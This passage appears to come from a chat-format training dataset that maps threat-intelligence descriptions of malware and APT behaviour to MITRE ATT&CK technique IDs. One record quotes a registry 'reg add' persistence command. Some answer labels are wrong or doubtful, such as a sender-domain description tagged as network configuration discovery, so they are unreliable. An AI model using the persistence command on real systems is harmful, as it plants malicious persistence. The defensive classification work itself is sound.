- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon."
- },
- {
- "role": "assistant",
- "content": "T1059.002 - Command and Scripting Interpreter: AppleScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Email attacks often use “click-worthy” or interesting topics to convince users to click links or open attachments that could lead to various threats"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell supports functionality for VNC sessions."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download an executable to run on the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has sent malicious links including links directing victims to a Google Drive folder."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FunnyDream FilePakMonitor component has the ability to collect files from removable devices."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather network share information."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 places scripts in the startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors used JavaScript code."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use a number of known techniques to bypass Windows UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The chinapolicyanalysis.org domain was used as the sender address, as well as the hosting location of the malicious RTF document"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Later, the malware enters in a big block of trash code that also includes some elements to decrypt strings and important information for later"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used GitHub to host its payloads to operate spam campaigns."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte Figure 4: The second step uses RC4, using the first 0x20 bytes from the result of the first step as the RC4 key Figure 5: Encrypted (Top) and decrypted (bottom) configuration file It is also important to note that while the loader component and the configuration file are located in the same directory (%windows%\\system32), the encrypted backdoor is located in a different directory (%Program Files%\\Common Files\\System\\ado)"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has lured victims into executing malware via malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox has the ability to mask malicious data strings as PDF files."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can gather information about TCP connection state."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can encrypt C2 communications with a randomly generated key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes BAT and VBS scripts."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has used TCP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can disable Avira anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used \"InstallUtil.exe\" to execute malicious software."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop was installed under names that resembled legitimate Windows file and directory names."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that can capture screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Compromises users’ saved passwords from browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various batch scripts to establish C2, download additional files, and conduct other functions."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can wipe drives using Remove-Item commands."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT has the ability to download additional payloads onto an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "running software, system name, IP address) - install additional malware onto the system - check for the presence of 29 different antivirus tools"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created new Windows services and added them to the startup directories for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging."
- },
- {
- "role": "assistant",
- "content": "T1622 - Debugger Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used brute force techniques to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. The primary difference was that this sample was encrypted and password protected, requiring the victim to enter in a password which was likely provided by the adversary to view the document. Typically, password protected documents is commonly used by adversaries as an evasion tactic to bypass automated analysis mechanisms due to the password requirement for successful execution. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3)"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy"
- },
- {
- "role": "assistant",
- "content": "T1587.002 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to steal information about printers and the documents sent to printers."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has encrypted collected data with AES-256 using a hardcoded key."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cmd.exe to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has injected SMB URLs into malicious Word spearphishing attachments to initiate ."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial beacon packet for contains the operating system version and file system of the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca modified the registry using the command \"reg add “HKEY_CURRENT_USER\\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has established email accounts for use in domain registration including for ProtonMail addresses."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet used xp_cmdshell to store and execute SQL code."
- },
- {
- "role": "assistant",
- "content": "T1505.001 - SQL Stored Procedures"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has modules that are capable of capturing audio."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used the BlackEnergy KillDisk component to corrupt the infected system's master boot record."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument \"dig.\" The group has also used a tools to dump passwords from browsers."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM can use loop operations to enumerate directories on a compromised host."
- },
- {
- "role": "assistant",
